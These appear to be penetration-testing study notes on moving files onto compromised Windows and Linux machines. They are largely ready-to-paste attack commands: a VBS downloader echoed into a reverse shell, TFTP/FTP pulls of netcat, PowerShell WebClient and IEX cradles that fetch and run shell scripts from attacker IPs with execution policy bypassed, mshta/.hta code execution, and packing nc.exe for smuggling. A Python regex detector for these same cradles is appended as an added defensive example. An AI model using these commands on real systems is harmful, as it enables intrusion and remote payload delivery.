File Transfers
HTTP:
PYTHON:
python -m SimpleHTTPServer 80
Apache:
# cd /var/www/html/
# wget -O exploit.html http://www.exploit-db.com/download/24017
# systemctl start apache2
or
#service apache2 start
//HTTP. Navigate to 127.0.0.1 to see it
//the document root (home directory for all documents) will be /var/www/
//add a file
#echo "Yo bitch" > /var/www/index.html
//browse back to the page and see how we changed the index.
PHP:
#php -S 0.0.0.0:8000
RUBY:
#ruby -run -e httpd . -p 8000
BUSYBOX:
#busybox httpd -f -p 8000
.hta: (internet explorer/edge vector)
If a file is created with the extension .hta instead of .html, Internet Explorer will automatically interpret it as an HTML Application and offer the ability to execute it using the mshta.exe program. This is used as a way to launch applications directly from the browser instead of having to download them and then execute them. This goes against the usual security rules imposed in Internet Explorer, so mshta.exe launches and runs the .hta file outside of the security boundaries of the browser. This requires the user to click to accept these permissions. If the user does this, we can run arbitrary code on the system with the user's permissions.
VBS: (for wget)
When FTP/TFTP fails you, this wget script in VBS was the go-to on Windows machines.
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute (first argument is the URL, second is the local file name to write)
cscript wget.vbs http://10.10.10.10/file.exe file.exe
FTP
Passing netcat to a machine with a TFTP server:
//Windows XP and 2003 contain a TFTP client by default. A benefit of this program is that it works well in non-interactive shells, since it is not an interactive program like vim or ftp.
TFTP: (nc transfer)
in Kali:
#atftpd --daemon --port 69 /tftp
In reverse shell:
#tftp -i 10.10.10.10 GET nc.exe
FTP:
We can turn the FTP file transfer into a non-interactive process by providing the ftp.exe client with a text file containing the commands to be executed.
Set up ftp server on attacker:
Then on the win vic, with our FTP server configured, we can paste the following commands into a remote Windows shell and download files over FTP non-interactively.
------------or you can just make a txt file normally if you have an editor-----
//keep a space between 21 and > so cmd cannot read "1>" as a handle redirect
C:\Users\offsec>echo open 10.11.0.5 21 > ftp.txt
C:\Users\offsec>echo USER offsec>> ftp.txt
C:\Users\offsec>echo ftp>> ftp.txt
C:\Users\offsec>echo bin >> ftp.txt
C:\Users\offsec>echo GET nc.exe >> ftp.txt
C:\Users\offsec>echo bye >> ftp.txt
------------
C:\Users\offsec>ftp -v -n -s:ftp.txt
With pyftpdlib
pip install pyftpdlib
Run:
(-w flag allows anonymous write access)
python -m pyftpdlib -p 21 -u bill -P bobby
curl --user bill:bobby ftp://10.10.14.50/winPEASx86.exe -o wp32.exe
Anonymous transfer
#wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98
PowerShell:
Non-Interactive PowerShell and VBScript file download methods:
The following set of non-interactive echo commands, when pasted into a remote shell, will write out a VBS script that acts as a simple HTTP downloader. It is the same wget.vbs script shown under VBS above, so it is not repeated here.
I think this goes towards the win vic
We can now host files at whatever dir we launch SimpleHTTPServer from and then download them from the win machine:
C:\Users\Offsec>cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Now with basic PowerShell:
C:\Users\Offsec> echo $storageDir = $pwd > wget.ps1
C:\Users\Offsec> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\Users\Offsec> echo $url = "http://10.10.14.20:8081/evil.exe" >>wget.ps1
C:\Users\Offsec> echo $file = "new-exploit.exe" >>wget.ps1
C:\Users\Offsec> echo $webclient.DownloadFile($url,$file) >>wget.ps1
Now, we can use PowerShell to run the script and download our file:
C:\Users\Offsec> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
PS file transfers (you might need to try the full PowerShell file path sometimes):
# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://172.16.40.5:8080/nc.exe','C:\Users\eLS\nc.exe')"
//send shell file and run
c:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/myshell.ps1')
or
PS>IEX (New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/Sherlock.ps1')
FILE TRANSFER:
>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
>wget.exe -V
SMB
//start the host
#impacket-smbserver MyShare $(pwd) -smb2support -user squanchy -password squanchysPass
Don't get your hopes up, it's not a real cred set
//make object on winbox
>$pass = convertto-securestring 'squanchysPass' -AsPlainText -Force
>$pass //testing it worked
>$cred = New-Object System.Management.Automation.PSCredential('squanchy', $pass)
>$cred
>New-PSDrive -Name squanchy -PSProvider FileSystem -Credential $cred -Root \\<kali ip>\MyShare
//then wait a while for it to connect and give you a prompt (about a minute)
>cd squanchy:
>dir
>.\winPEAS.exe
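Defensive counterpart to the transfer methods above (the wget.vbs and PowerShell WebClient/IEX downloaders, the ftp -s: and tftp -i GET transfers, mshta for .hta files, and the New-PSDrive mount of the impacket share): an added example that is not part of the original notes, which flags those command-line patterns in process-creation or script-block log text. The 'host|user|cmdline' record layout, the sample records and the technique names are constructed for this example.

```python
"""Added detection example: flag the non-interactive download techniques
from this page in process-creation / script-block log text.
Log layout and sample records are constructed for this example."""
import re

# Technique name (as used on this page) -> regex over the command line.
PATTERNS = {
    "powershell-webclient": re.compile(
        r"powershell.*\b(DownloadFile|DownloadString)\s*\(", re.I),
    "powershell-iex-cradle": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "powershell-exec-bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "vbs-downloader": re.compile(
        r"\b[cw]script(\.exe)?\b.*\.vbs\b.*https?://", re.I),
    "ftp-script": re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I),
    "tftp-get": re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\bGET\b", re.I),
    "hta-mshta": re.compile(r"\bmshta(\.exe)?\b", re.I),
    "smb-psdrive-cred": re.compile(
        r"New-PSDrive.*-Credential.*-Root\s+\\\\", re.I),
}

def classify(cmdline):
    """Return the names of every technique pattern that matches one command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]

def scan(log_lines):
    """Scan 'host|user|cmdline' records and return one dict per flagged record."""
    hits = []
    for line in log_lines:
        host, user, cmdline = line.split("|", 2)
        tags = classify(cmdline)
        if tags:
            hits.append({"host": host, "user": user, "tags": tags, "cmd": cmdline})
    return hits

# Constructed sample records modelled on the commands shown on this page.
SAMPLE_LOG = [
    "WS01|offsec|cscript wget.vbs http://10.11.0.5/evil.exe evil.exe",
    "WS01|offsec|ftp -v -n -s:ftp.txt",
    "WS02|els|powershell -c \"(new-object System.Net.WebClient)"
    ".DownloadFile('http://172.16.40.5:8080/nc.exe','C:\\Users\\eLS\\nc.exe')\"",
    "WS02|els|svchost.exe -k netsvcs",
    "WS03|admin|powershell.exe -ExecutionPolicy Bypass -NoProfile -File wget.ps1",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["host"], hit["user"], ",".join(hit["tags"]), "->", hit["cmd"])
```

The regexes are deliberately loose (a real ruleset would also pair them with parent process and network events), but they cover every cradle written out in these notes.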
Tips:
Pack and move nc:
# locate nc.exe|grep binaries
# cp /usr/share/windows-binaries/nc.exe .
# ls -l nc.exe
# upx -9 nc.exe
# ls -l nc.exe
# locate exe2bat
# cp /usr/share/windows-binaries/exe2bat.exe .
# wine exe2bat.exe nc.exe nc.txt
# head nc.txt
//We can now transfer nc.txt to the win machine and then turn the file back into an exe with debug.exe. The pdf did not show this step but it should be simple and easy to google.